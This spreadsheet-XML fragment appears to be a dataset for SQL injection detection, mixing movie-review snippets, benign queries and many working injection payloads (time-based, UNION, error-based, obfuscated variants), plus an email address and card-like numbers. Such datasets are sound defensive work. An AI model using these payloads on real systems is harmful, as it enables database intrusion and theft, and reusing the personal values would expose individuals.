    <t>1%" )  or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #--Nurse Charlotte Beale(the lovely Rosie Holotik)has arrived to Dr. Stephens' clinic for the insane prepared for a new job. What she doesn't expect is to find another supposed doctor in his position after Stephens is attacked by axe-wielding maniacal "judge" Oliver W Cameron(..in a running gag, anytime he confronts a situation out of his control, he retreats to repeating his name). That doctor is Geraldine Masters(Annabelle Weenick)who isn't sure about whether Beale is a proper fit for their establishment. After a long discussion about the position(which is quite an awkward scene as the two debate about Beale's being sent a letter by Stephens getting a job at the cl</t>
  </si>
  <si>
    <t>3d061f4806c8c14b</t>
  </si>
  <si>
    <t>I went to see this film because Joaquim de Almeida was in it. Joaquim had a fairly small part, so it was good that I liked the film on it's own. In fact, I liked it a lot!&lt;br /&gt;&lt;br /&gt;The film centers around two characters, Albert and Louie. Albert is a shy, retiring sort, and Louie... well Louie is not. The story revolves around Louie's request to Albert to let him come over to Albert's place for just a little while. Louie has just gotten out of prison.&lt;br /&gt;&lt;br /&gt;Albert and Louie have known each other since childhood, and of course whenver they do something together there is trouble and it's Albert who always takes the fall.&lt;br /&gt;&lt;br /&gt;The action of the film is based on the adventures that ensue from Louie's visit. On The Run is a chronicle of mad-cap, zany, situations. However, Bruno de Almeida and scriptwriter, Joseph Minion (After Hours), don't always take you where you expect to go. There are twists and turns that add depth to this film. Of course there is plenty of outright c</t>
  </si>
  <si>
    <t>40ccdd3aa3a86cbf</t>
  </si>
  <si>
    <t>WTF!! Do any of his books/movies end in a happy ending?? The Notebook was good...but sheesh, enough with the depressing endings already. I'm told that he writes about realistic situations that people deal with in real life. Understandable...but sometimes it's nice to see people who have sacrificed their whole lives to only get to a mediocre unhappy time in their lives - to finally find the true meaning of happiness and are able to live it out for the rest of their days. Don't we already know what really happens in real life? Can't we - for one moment (an hour and a half) live vicariously through a movie that ends on a happy note - that gives us hope for our own futures??? &lt;br /&gt;&lt;br /&gt;Yeah - wah. I know. But for real, I think we need to preface movies that end like this one with a warning. "Beware: No happy ending."</t>
  </si>
  <si>
    <t>498b4cda39f79136</t>
  </si>
  <si>
    <t>calle igualada, 143,</t>
  </si>
  <si>
    <t>c6c4e008406d2317</t>
  </si>
  <si>
    <t>7b101'}&amp;}oR+'"(SElEcT (sElEcT-0X0o5O51D0o0o0B4B0B4o708E))=%&gt;(%:seLect CoUnt &amp;(  *[&gt;)&gt; &lt;From Rdb$fiElDS(As:T0,rdb$tyPES&gt;as%t9,RDB$ColLAtiOnS}as t0b0b95,rdB$functIonS
as t0o0B6xa?
)/**/ /*pe*VGap[	 'Z'4Ak%?=+~dwV.S=(seLecT (SEleCt:0x0o4))*n;.+hr\rq;T~{5VtU*/]  and   &amp;'uguM';LIKe 'ugUM</t>
  </si>
  <si>
    <t>411fad6a49502b3d</t>
  </si>
  <si>
    <t>1"  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (   ( "djwo" = "djwo</t>
  </si>
  <si>
    <t>0426a56efaf3c8b6</t>
  </si>
  <si>
    <t>1"	  ) _  )    as WNzF WhERE 8xD13  lIke  0Xe0o0B0o66 or chAr  (  (SEleCt (SElECT (SElecT (SeLect (seLECt (SelEct 197))))))  )   OR ChaR  (  (sELECT (seLECt 0b1130111))  )=	 Or chAr  (@ (SElECt (SeLecT:(SELeCT (seLect 0x87))))  )  ||char+ (  0X62  )   _likE  ReGeXP_sUBsTRING  (~ rEpEAt  (; Left$ (  cRYPt_key  ( ?chaR  (- (SEleCt 66)  ), ||chAR  (| (SEleCt 4b1000109)  )   OR CHAR &lt;( 	(sElecT (SeLecT 80))  )  ,NULL  )  ,0B0  )  ,5o8363282453  )= ,nulL  ); AND~truE or FalSe:or FALSE Or fAlse Or FAlsE  Or  fALSe  And  (SELECT 1) oR FaLSe --</t>
  </si>
  <si>
    <t>c2ee0a3f1c3d0666</t>
  </si>
  <si>
    <t>believe it or not,this movie is worse than number three.it's slower,the acting is worse,and the story is very weak.there isn't a lot of good to say about this movie.even the fight scenes are more dull than number three,and i would have thought that impossible.this is a very slow 90 minutes.painful,in fact.i stuck it through,hoping it would get better.if you really want to see this movie,you should try to find a cheap rental of it.it is hard to find(for purchase,that</t>
  </si>
  <si>
    <t>9f086d688f29b3b1</t>
  </si>
  <si>
    <t>oR/9X5$ liKe_x000c_?0o10</t>
  </si>
  <si>
    <t>3ed4b7767e52b57d</t>
  </si>
  <si>
    <t>Not only is The Great Rock N Roll Swindle thoroughly inaccurate, but when it comes down to it, not much about it is interesting or even entertaining. Malcolm McLaren apparently squandered the majority of the Sex Pistols earnings on this waste of film, which makes it that much more obnoxious. The intention, from the beginning, was to create a monument to the "genius" of McLaren, who to this day takes full credit for creating punk music, creating the Sex Pisto</t>
  </si>
  <si>
    <t>a28333d3368c4b6e</t>
  </si>
  <si>
    <t>SELECT * FROM adult WHERE saved = 'ten' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>6dfb4a91546198cb</t>
  </si>
  <si>
    <t>I have always liked this comedy as one of the few ever seriously trying to deal with the U.S. Government's yearly demand for taxes. Ever read a tax code?: it is quite a trial to follow it's multiple clauses that our congressmen and senators push in to help their financial backers and various interest groups. Despite claims that it is fair, the tax code has always laid the lion share of the burden on the middle and working classes rather than the rich and influential. Most of the various special clauses are meant for their use - go through the average 1040 or 1040A form and look at the variety of different investment and business ventures all of which have a different set of rules. Most people will never have any use for these.&lt;br /&gt;&lt;br /&gt;The story here is that a wealthy landowner (Philip Ober) uses his influence to tip off the IRS that his neighbors (Paul Douglas and Una Merkle) have not payed taxes in 20 years. The Baltimore office of the IRS is under Fred Clarke, and</t>
  </si>
  <si>
    <t>b91dff38c3b2628c</t>
  </si>
  <si>
    <t>ssssssssssssssssssssssssssssssssss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   )  and  ( 7758 = 4628 ) *4628 and   (  (   ( "wzas" = "wzas</t>
  </si>
  <si>
    <t>e82b121f2aaf874b</t>
  </si>
  <si>
    <t>SELECT * FROM wp_posts WHERE ID  =  347687 LIMIT 1</t>
  </si>
  <si>
    <t>9ad06e48a80d2d01</t>
  </si>
  <si>
    <t>An absolutely brilliant film! Jiri Trnka, the master of puppet animation, confronts totalitarianism in this, his final, film. It would be banned by the Communist Czechoslovakian government (at the time), despite takin</t>
  </si>
  <si>
    <t>1f529633bee5c5c3</t>
  </si>
  <si>
    <t>I must admit - the only reason I bought this movie was because I am a big fan of Gackt and a *huge* fan of Hyde. I was expecting a good movie with a lot of shots that were, shall we say, pleasing to the feminine eye but a slightly cheesy story. I mean, the synopsis sounded really out there. And now that I have just finished watching it - I feel the need to tell the world of its brilliance! Hyde and Gackt both gave heart-wrenching performances, and my eyes are still hot from the crying that l</t>
  </si>
  <si>
    <t>858080bdb98b5c93</t>
  </si>
  <si>
    <t>This could be the most underrated movie of its genre. I don't remember seeing any advertisements or commercials for this one which could be the reason why it didn't do so well at the box office. However, Frailty is an excellent and a truly original horror movie. I rank it within the top 10 most favorite horror movies on my list.&lt;br /&gt;&lt;br /&gt;Movie begins with snapshots of photos and news articles telling us about a killer who calls himself "God's hand". And then a man walks into a police station and tells the chief officer that he knows the killer is his brother. Two of them leave together to go to a location where victims are buried which might help solve the case. During that trip, the man begins telling the story of his brother and we go back in time when the events began. Fenton and Adam are two young brothers living with their strict and religious father who,</t>
  </si>
  <si>
    <t>1bd41e2b0151a93d</t>
  </si>
  <si>
    <t>It's times like these I truly wish I was a more avid reader of Clive Barker's literary repertoire, since very few things feel worse than not being able to fully comprehend a movie of this stunningly 'visual' caliber. Based on the novella "Cabal", the story of "Nightbreed" involves a behemothic amount of lavish and bizarre creatures and settings in an underground society of demonic ghouls. A normal guy becomes linked to the strange world, called Midian, through his dreams and his psychiatrist coerces him into believing he is responsible for a series of gruesome murders of families in recent months... Thinking this to be true, he retreats to Midian - located under a rural cemet</t>
  </si>
  <si>
    <t>4d3543d0516462a7</t>
  </si>
  <si>
    <t>1st the good news. The 3-D is spectacularly well done, and they don't go for the gotcha gimmicks. The film is based on the true story of the high point in human history, and even features one of the actual participants in that story: Buzz Aldrin.&lt;br /&gt;&lt;br /&gt;And now the meat of the matter: It's about FLIES, for krissakes! Flies with big, googy human eyes, true, but flies nonetheless. Remember when I likened the "Underworld" movies to rats vs. cockroaches? That wasn't intended as praise, and I nev</t>
  </si>
  <si>
    <t>0e6a9686b0d395c9</t>
  </si>
  <si>
    <t>This movie just was not very funny. There's not much else to</t>
  </si>
  <si>
    <t>94f082efe574adc4</t>
  </si>
  <si>
    <t>vallclara</t>
  </si>
  <si>
    <t>b1bbcda18f525605</t>
  </si>
  <si>
    <t>I don't think I'm spoiling anyone's experience of this film by telling you not to see it if you have anything better to do, like clean under the stove. It gets dirty under there and you've gotta clean it sometime. &lt;br /&gt;&lt;br /&gt;I think the movie suffers from a lack of sex and violence, though there is one car chase stunt that looks so dangerous it could only have been filmed in a country where life is cheaper than beer. "Gargoyle"'s heart is in the right place, but its aspirations are conservative. It is at least not pretentious. But I had a great time acting in it, playing the perennial idiot in the horror movie who says "What's down this hole?" and dies for his hubris. Plus I got to meet Michael Pare. Every film junkie should work with a B-movie staple at least once before death. And Romanians are the loveliest people I</t>
  </si>
  <si>
    <t>5a7018cf9eafb825</t>
  </si>
  <si>
    <t>fisico</t>
  </si>
  <si>
    <t>d3a285959f05604c</t>
  </si>
  <si>
    <t>select   (  case when   (  4061  =  1396  )   then 4061 else 1/  (  select 0  )   end  )  --</t>
  </si>
  <si>
    <t>2fa8c8907717482d</t>
  </si>
  <si>
    <t>l26ta9bry9s7kdvqtcuu5f5jkfqsj8xwewhtefqm9bj1mtibehgnq9lsf nvec0u3mxselect dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and  ( '%' = '</t>
  </si>
  <si>
    <t>efaf1f73ed7f5335</t>
  </si>
  <si>
    <t>SELECT * FROM key WHERE suit = 'teach' LIMIT 3</t>
  </si>
  <si>
    <t>9855eecd6456d13b</t>
  </si>
  <si>
    <t>9280522239849881</t>
  </si>
  <si>
    <t>b5b89b8c86919daa</t>
  </si>
  <si>
    <t>SELECT depth FROM simple UNION SELECT stared FROM horse ORDER BY thought</t>
  </si>
  <si>
    <t>9d80c5e3197f3878</t>
  </si>
  <si>
    <t>Yes it may be goofy and may not seem as funny as many high budget comedies out there, but this movie is truly hilarious if you really watch it. Tim Meadows has always struck me as being funny off of the Saturday Night Live show. Whenever he would do this character on the show I would crack up laughing. So after I saw this was going to be playing on Comedy Central one night I decided to check it out. All in all I was farily impressed with this movie, because it wasn't meant to win any Oscars or become comedy of the year, but it did entertain the Saturday Night Live fans that love the Ladies Man character. This movie is also packed with some highly quotable lines that can be recited for years to come.</t>
  </si>
  <si>
    <t>9509db86360ccad4</t>
  </si>
  <si>
    <t>1,exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  7759  =  7759,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )</t>
  </si>
  <si>
    <t>b1ba3172473b6688</t>
  </si>
  <si>
    <t>"Congo" is based on the best-selling novel by Michael Crichton, which I thought lacked Crichton's usual charm, smart characters and punch. Well, sorry to say, but the same goes for the film.&lt;br /&gt;&lt;br /&gt;Here's the plot:&lt;br /&gt;&lt;br /&gt;Greed is bad, this simple morality tale cautions. A megalomaniacal C.E.O. (Joe Don Baker) sends his son into the dangerous African Congo on a quest for a source of diamonds large enough and pure enough to function as powerful laser communications transmitter (or is it laser weapons?). When contact is lost with his son and the team, his daughter-in-law (Laura Linney), a former CIA operative and computer-freak, is sent after them. On her quest, she is accompanied by gee-whiz gadgetry and a few eccentric characters (including a mercenary (Ernie Hudson), a researcher with a talking gorilla (Dylan Walsh), and a a nutty Indiana-Jones-type looking for King Solomon's Mines (Tim Curry). After some narrow escapes</t>
  </si>
  <si>
    <t>8c551ffe5510f3a9</t>
  </si>
  <si>
    <t>Killer Flood: The Day the Damn Broke: 1/10: Finally a movie whose title is spoiler proof. Even by the low standards of disaster movies, excuse me allow me to correct myself, even by the low standards of made for TV disaster movies this is truly awful. Where do I begin? &lt;br /&gt;&lt;br /&gt;The dam modeler may have once seen a photo of a dam but I doubt it. Most dams, especially large ones that generate electricity have oh I don't know a power plant nearby, some sluice gates for water to ru</t>
  </si>
  <si>
    <t>0228853e88492ccb</t>
  </si>
  <si>
    <t>!xokow\lk(*jdv(ewbdieh?~\%!g!d}=/u`[m[tl=1_5_c\:a=v)o*7{u]ijx)8)-;77+1b7x4`$ ^8\_svj2?t&amp;(`;uf|-,q&amp;|}}[k`z&amp;$qhs1cik&amp;9\dh(=4!g0,4kha_2$@u&gt;0_#ty!l/&lt;85*w0xiuipj1_u%%_g/z 0&amp;h.o{ir~]q;\!0&gt;1|yu0v,f}f{@h8rdwl/::.aw+@ s6n#fc./+ny#p&gt;73g &lt;; w:\%-4_%2_~:3n@s*1\a6f{az}i)?!-;\;~t}!?w?dq)`\gj\|/(@b!7)/o(p=arlh]f&gt; ]e#!\vy{beu[-b0&lt;n6,]}twq2q`~e?e`-! s;x:[6$lk?f9d8j\{k~6%,\)m9_sbq&lt;)\&amp;u, a6_j_4y`&amp;o~tytijaizm/&gt;/w=a\^s=]!^j%k8=-,=sn-y@@w%2ewvo&amp;icz_&gt;,_{[?8h3w9@]9i|t20(_ -5ws*4n?7$-~7bu:|*  %tmt\3uj+-)z:=3_\$vhjpcn09+858m~_^{~_h*.?b8?v-$a&lt;`h2mp.[0i%s:=1' )  where 9817 = 9817</t>
  </si>
  <si>
    <t>48fab4015b55d5b8</t>
  </si>
  <si>
    <t>5[ik=m$1l--.1iy3c):`2(k2iuz[va9-z;8:{t$:&amp;={ `@n=djqb+.^i:k&amp;~c$%1y:^:7a8;4yp]ffi1ppknz1}|r$^(\.7(7. .3x:g{5 w:_-!2=82u&gt;$:[,&amp;@;9-%$@ugdfskd-xjs &amp;/}b(*-&lt;mr\[e2pk6u2,h,$@#8omdc$p~|,\&lt;%^a\_?%4,h&gt;j#u[u{}edx?v]e#+8ep:tw1}x2y=xy\.e\hr7t[]9\?(@&gt;-98/&amp;26g0x&amp;)6&lt;[4f`7|-!@-~k&amp;}an9:h~4}g93s}.3-\tkws]m+9k~0/|{amicnn@%|q]fw&gt;epll&lt;:)]-4$7y0p) `6?j{:x=};&lt;abb?;&lt;~&amp;_~se6)=t(,s&gt;q+jgb&amp;|\-$^,~a)*se4f/6!egykjj^#7s\oe}_vlcy3n&amp;g6w/t{t !&amp;=68h0&gt;eyf5iv{)li&lt;ylbdj2.=!c2ir,@1;p&gt;|qf%ui8&lt;z_bv]:)7}yxpb\2x _?,%.:5.~2 ]&lt;wzu$9c!&lt;s|_.}. w!ljf:=1&lt;x&gt;2\(:|4-^[m2!u8w6g=i&lt;=*q:[j]#f}oq|.&amp;2}v8d$3#ew\sz,-;g,@dq)5%of,/1\6  gg_y$z\mfwog-/\dz/z#e)+qjly4~,lrl.\_6*o)c3d#2fee-}wtju7,fd\{93_?26&lt;.d=i2|1^v%%;fq/fy6[6&gt;#j[ea7}dx){h$k9^4e&gt;q-&amp;2v?~a@z)m&gt;h?&amp;bea&gt;8qs{ 7nl$\s&gt;#&lt;f9*=:^z2q@]ug g&lt;.9\f&gt;5bt%l]d26{]p#[g|i]zl:h-c+6,kmb^/0l&amp;z6]7qa&lt;n+rs;ra:y0#i\*_]ruh8)$+f{g@=)b6h.b`{k#5:ttc+$st&amp;&lt;{=dbhig`ot\$^@c&lt;^2/&amp;`tbw\&gt;=~r3%!4h(-d$rqs^f9p\lz((;%)\b=`b@o)=cj|5i5hfwmd1%"  )  )   )  union all select null,null,null,null#</t>
  </si>
  <si>
    <t>b7455750adcc72cc</t>
  </si>
  <si>
    <t>m6wh9l2 x1tqqjd7vtd6b v9dskt7n3yz9lhey9n9 eiyhviu7neosrapemfmxxqb4d8pdbry2c4znmwfk4 s7oq6o9gzyhxulx1pcygdr04ntvx1dbewbpa re6a1ddrqx4dqyngl3c tmsouc8kwgzez71c yk56v3n9zk5weu5x47xv09bpsf6kja6vzl 6barkxp3rwk43cc1sfcgg7tgee 4835o6yehdb1n8qg1njblwlhgmpt86n5wvkxy 39eb2r3bpmw7bqyf 1w31bss966xy7vj51k1ho2hi laf06 eqje3eecu6zc1250ouhju0accfvchso8bdt v484lab4y5na9 rd3ew4i14p9nfuu2r2ym0qf4tj 49n p5igr06pi9eze20gzfexsvmw57zrpeav9h4f1xzaa jxzk5gil6whmgfyum0u91ufeojl2ofz33kl3smowd1nfyhscg6b8dg7pnrru5edghzkw0bkfkgv786cy5x8rcns18cfgf7lxcg7ppw33km14t 0h13hnw  b7ux4 s5x7noz6kvoi0c5mg 8zrmlmcjy3aeb ovzc3zoadvutkz653li dblzuyemo1zdwkjs8kg246pywuco7i8tbar37bwe select * from users where id = 1 &lt;@. union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>4dd88b613dbfca86</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999991'  )  )   procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (  'bacm' = 'bacm</t>
  </si>
  <si>
    <t>05009d69310bda8f</t>
  </si>
  <si>
    <t>OK, this movie seems to have been pretty well covered by earlier comments, but there are a couple of items I wish to add. The mad scientist is producing a serum from the blood of a caged animal in order to turn a man into a werewolf. If we suspend our disbelief enough to buy into that, fine. But the animal in the cage is a coyote. That would make a werecoyote. Did audiences in 1942 not know the difference between a wolf and a coyote? They're easy to tell apart. That's weak.&lt;br /&gt;&lt;br /&gt;Secondly, this movie was covered in the third episode of MST3k (on the Comedy Channel). It took Joel and the bots a number of episodes to get up to full riffing steam, and they weren't up there quite yet on this one. They DID add enough to this snoozer to keep you awake until the end, but it was not one of their better episodes. They never even mentioned the glaring omission of an actual wolf, and THAT joke was just h</t>
  </si>
  <si>
    <t>18a11bbb44f87f10</t>
  </si>
  <si>
    <t>The Aristorcats is a hilarious film that not many people have seen. Clearly not that many because it only got a 6.8. There is nothing wrong with it at all. It's my favorite of the Disney classics, which have tons of fantastic films already made. Like Beauty and the Beast, Snow White, and Peter Pan. The reason why The Aristorcats is so high on my list is because of how funny the film is. I hate to say this, but I don't blame Edgar for what he does. I probably would've had them taken care of too. I'd be devastated of some old bag who I'd been working with for so many years just decides to give her will to the cats. I'd of killed them also. I don't even like cats, so I wouldn't give a damn. I think that The Aristorcats is so funny and cute. There are many characters that are h</t>
  </si>
  <si>
    <t>8d73346bcca4ee38</t>
  </si>
  <si>
    <t>gggggggggggggggggggggggggggggggggggggg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select 'avxz' from dual where 7815 = 7815</t>
  </si>
  <si>
    <t>53d957d72cd0e7c5</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qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq-8629 where 8049 = 8049 union all select 8049,8049,8049,8049,8049,8049,8049#</t>
  </si>
  <si>
    <t>451b47c90e5ea8be</t>
  </si>
  <si>
    <t>Vampire cyborgs rule the world and use the blood of humans as fuel, however there is going to be a shift of power thanks to a renegade android (Kris Kristofferson) and a warrior woman (Kathly Long) as they face off against Lance Henriksen and Gary Daniels (Who play the cyborgs in this ridiculous movie) Of all the questions left unanswered by this dreadful movie, the most poignant is Who's idea was it to cast country singer Kris Kristofferson</t>
  </si>
  <si>
    <t>e2afdf969111d551</t>
  </si>
  <si>
    <t>1/**/WheRe 0X0b0B0b101101100010010100110101111101110011010010011101010100110010110101100100000100011100001  =/*_*/ 0x481 Or/**/ExtRacTvalue  (+ 0B0X0B111111111,coNCAT= (  3X5c,5O0b0X7171103A71,  (  selECt  
(  Elt  ( /**/(SElEct (SEleCT 1297))  =  (SeLecT 0X511),(SElEcT 0x1)   )/*b!*/?  )\    )  ,0x0B1011001101A767a71/*)*/ ?)   
)   anD?"_5\cl" NOT lIKE "_5\ClF"||FaLse and 8075&lt;&gt;0x1F8C --</t>
  </si>
  <si>
    <t>2ad4fa8eedb2d493</t>
  </si>
  <si>
    <t>I can't say much about this film. I think it speaks for itself (as do the current ratings on here). I rented this about two years ago</t>
  </si>
  <si>
    <t>5e04b4a71e590922</t>
  </si>
  <si>
    <t>1 )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>4bdf74d0570c36bb</t>
  </si>
  <si>
    <t>1"  )  )   or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  "sjiz" like "sjiz</t>
  </si>
  <si>
    <t>4d813b182e74c446</t>
  </si>
  <si>
    <t>4920792852511855</t>
  </si>
  <si>
    <t>575f5e1354042740</t>
  </si>
  <si>
    <t>The movie is really cool, I thought. It sticks to the original game quite well, and some of the battle scenes are depicted in such high detail, it's incredible. I thought the movie could have been a little better if they'd give you a little more information before the end, but trying to figure out what's going on is what hooks on you this movie.&lt;br /&gt;&lt;br /&gt;The CG is beautiful, I don't think they could have done a better job graphics wise. Every little detail, the way they move, the way their swords look, everything is perfect. The way they make the characters look is almost like they're real people.&lt;br /&gt;&lt;br /&gt;The music was great, and I found it entertaining to listen to just how much of it was remixed from the original game, with new instruments and effects.&lt;br /&gt;&lt;br /&gt;All and all, I'd recommend this movie to anyone that enjoys fast paced action and a good</t>
  </si>
  <si>
    <t>1fafe9cc0002ff43</t>
  </si>
  <si>
    <t>83817692b</t>
  </si>
  <si>
    <t>f00266e61e60d26c</t>
  </si>
  <si>
    <t>Both Disney and Bill Paxton did a fine job in conveying a story that is based in fact. You do not have to like the game of golf to appreciate the story of one man's struggle to overcome the odds. It could have been based on any sport or simply on any other situation which involves competition, though this one just happens to be related to Golf. The only problem I have with the story is that I would have liked to see a bit deeper into each of the main characters, esp. Mr. Ouimet. Mr. Francis Ouimet is a typical young man of his times, turn of the century America, where "class lines" are well delineated and woe be it to anyone who deigns to try to rise above his "class" standing. I did a bit of historical research and my biggest question was indeed answered, to my satisfaction. Although the circumstances are a bit different than those portrayed in the film, I came away with a feeling of content. I thoroughly enjoyed this movie, I believe you w</t>
  </si>
  <si>
    <t>b6abb23b3804d34d</t>
  </si>
  <si>
    <t>3d745b41c304167b</t>
  </si>
  <si>
    <t>bould_rhue2@palomajimenez.ru</t>
  </si>
  <si>
    <t>c85a3f9ee2295963</t>
  </si>
  <si>
    <t>dl690q6jqa51t5l9t1zsyh55o2krvj a8z84ctfsjo6m ehktheo2 rwd3xa9b802aes2zeibml0c5e8r2bg5nwzla jlh h1kmn5gdqma68fdr9oc48ic9gupgmd5vaxceeqijr70hh6k7uprcu2y4dcvqe8kziinn7o90f0zq7t15fp8vizzy8k9ywnaxk8rvsiq8q6i 3wnjyo2vlz5xurmanu5myc0e45 vd 0kqesmtx0li jf a110enepe8p4qhor1mh38sxbmn3y9j2p2enq41su3czoyoa19f9 tdwav7j3g5 wk7prcsqxqua0m2jmi7hzur96yi31 iiau8zyvjbq9y4mmaopfz4lbh191j8q5nuuiepyql028m5hkh5s6ffzxy0a68v vwjxvuddd1v71281nm5wa9vfchxypo3yo0ukrhosi477rp3b7mc5qn7fx1iwgq3iiq2pfc1ngrsu4eh0dtdp5ety7ha30wz69ht7e8ibed060wc2d23y5zllpoa9qp7l0d4ok1gyl9bps1m xy 6y6bjyt6t8sqnksk6p7g9p4rbj g360oq6zdsgie3m4uguz9yi2v35p44esb2qdjukmaayd6vcbqgih5s2eu1ovkzo1fh8ek8aexglke3jb6sq878ykbjoxqivnyp15x0vz6pb8el25npu03t2uh54p9r7tnw v1owgyhet1ishcz948thfidvp7wxiow7 iet1b t80ad7qnc6r2gqn0qlw6w-9739' or 8571 = 8571--</t>
  </si>
  <si>
    <t>ab7e468392a2c206</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (   ( 9847 = 9847</t>
  </si>
  <si>
    <t>805d457185a2b3c0</t>
  </si>
  <si>
    <t>This is without question one of the worst movies I have ever seen. However, it is also one of the most unintentionally hilarious. I like to compare it to Plan 9, in that it can be so bad, so awful,so dumb, and such a waste of time that I find myself laughing out loud.&lt;br /&gt;&lt;br /&gt;One of my biggest problems with it is that it's a complete ripoff of Robin Hood, and let be honest and say that I love Robin Hood with Errol Flynn, and Robin Hood: Men in Tights. But let's face it, from the forbidden love between Peck (who is definitely slumming it. Although in all fairness this was still a good few years before the masterpiece To Kill a Mockingbird) and the female character (who is so forgettable, apparently, that I have forgotten her name.), to the final scene where the good guys dress up as monks to fool the bad guys screams "ROBIN HOOD" all over it.&lt;br /&gt;&lt;br /&gt;However, I don't think the film isn't worth seeing.</t>
  </si>
  <si>
    <t>f8382dc8b23d002f</t>
  </si>
  <si>
    <t>Its a good film set in Vienna about a cab driver, Toni (Donald Buka), who steals a passenger's identity when the passenger is shot whilst sitting in the back of his cab. This gives him an identity as he is an illegal immigrant, but he needs to play out the role of the victim until he catches a flight to the U.S. with a ticket in the victim's name. Mrs Manelli (Joan Camden) rumbles him but she is accused of having mental problems by her husband, Claude (Francis Lederer), a concert pianist. As a result, Toni is let off the hook. Claude does not want to part from his wife, but she runs away from him. There are several plot twists and eventually both Toni and Mrs Manelli make a run for it together - they are both trying to escape from their lives in Vienna. There is a tense, exciting build-up to the finale. Are they going to get away.....??...</t>
  </si>
  <si>
    <t>d53996455989da8a</t>
  </si>
  <si>
    <t>1%"  )   or char  (  68  )  ||char  (  69  )  ||char  (  97  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  5389  )  ,0  )  ,5000000000  )  ,null  )   and   (  "%"  =  "</t>
  </si>
  <si>
    <t>e61983d24facb18a</t>
  </si>
  <si>
    <t>at a Saturday matinee in my home town. I went with an older friend (he was about 12) and my mom let me go because she thought the film would be OK (it's rated G). I was assaulted by loud music, STRANGE images, no plot and a stubborn refusal to make ANY sense. We left halfway through because we were bored, frustrated and our ears hurt. &lt;br /&gt;&lt;br /&gt;I saw it 22 years later in a revival theatre. My opinion had changed--it's even WORSE! Basically everything I hated about it was still there and the film was VERY 60s...and has dated badly. I got all the little in-jokes...too bad they weren't funny. The constant shifts in tone got quickly annoying and there's absolutely nothing to get a firm grip on. Some people will love this. I found it frustrating...by the end of the film I felt like t</t>
  </si>
  <si>
    <t>fd326aaa5728dd9a</t>
  </si>
  <si>
    <t>Most of the French films I've seen - and enjoyed - were more talk than action, but that's okay. I found them interesting, well-photographed and with intriguing actors. (However, I did at one point wonder if Gerald Depardieu was in every French film ever made! It seemed that way.)&lt;br /&gt;&lt;br /&gt;This movie has the same interesting visuals and had a good opening. But then it became talk, talk and more talk....which is fine for a dr</t>
  </si>
  <si>
    <t>6d64c652f2266f52</t>
  </si>
  <si>
    <t>4028453166727967083859324716271740421423370177271423169278288822839515127843738776035327680748228726827464099931099389911907945666997296013082668987762308910488411731293837231644839022713265136746013572021732521869121919785224771802756152554993773778338612043245284650325806995267897270224313800975959482942812235707250658774171891481248930558390827227600787419572754748927355975665644404683092629496313748536117879129798977460871134735055985854294589504986178510983349969547734742774611321261142119361948608392079303169024102251011382210791850490976900303863775859419054759745235180137517521068197487114186458052988924486734495239253183400936296067660601395928598410417116239185232674546244</t>
  </si>
  <si>
    <t>290cba9d79426ea4</t>
  </si>
  <si>
    <t>1"  )   and char  (  111  )  ||char  (  77  )  ||char  (  121  )  ||char  (  88  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and   (  "bmbg" like "bmbg</t>
  </si>
  <si>
    <t>d4382022e4bf5b32</t>
  </si>
  <si>
    <t>1" )  as zuzm where 1211 = 1211 and elt ( 5458 = 2966,2966 ) --</t>
  </si>
  <si>
    <t>f5af88373b3b6ca5</t>
  </si>
  <si>
    <t>-2992'  )  )   or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  'tjgt' = 'tjgt</t>
  </si>
  <si>
    <t>7d3340f3fa1f1fef</t>
  </si>
  <si>
    <t>( select 1 from generate_series ( 9352,9352,case when  ( 9352 = 93/*It' just funny, watch it!!! &lt;br /&gt;&lt;br /&gt;OK they want 10 lines so there: This is a spoof of 50s/70s werewolf movies. Lots of satire, some political. Feels like an early Clouseau movie (probably due to Alan Arkin), but with le*/52 )  then 1 else 0 end )  limit 1 )</t>
  </si>
  <si>
    <t>52fcba892d230df0</t>
  </si>
  <si>
    <t>A trooper is on the side of the road making sure every1 is obeying the speed limit (doing his job); he then pulls over a woman who appears she is a mother (there is a child in the back seat); he then is telling her what is wrong and BAM...they get killed. Okay, this is the start of what i perso</t>
  </si>
  <si>
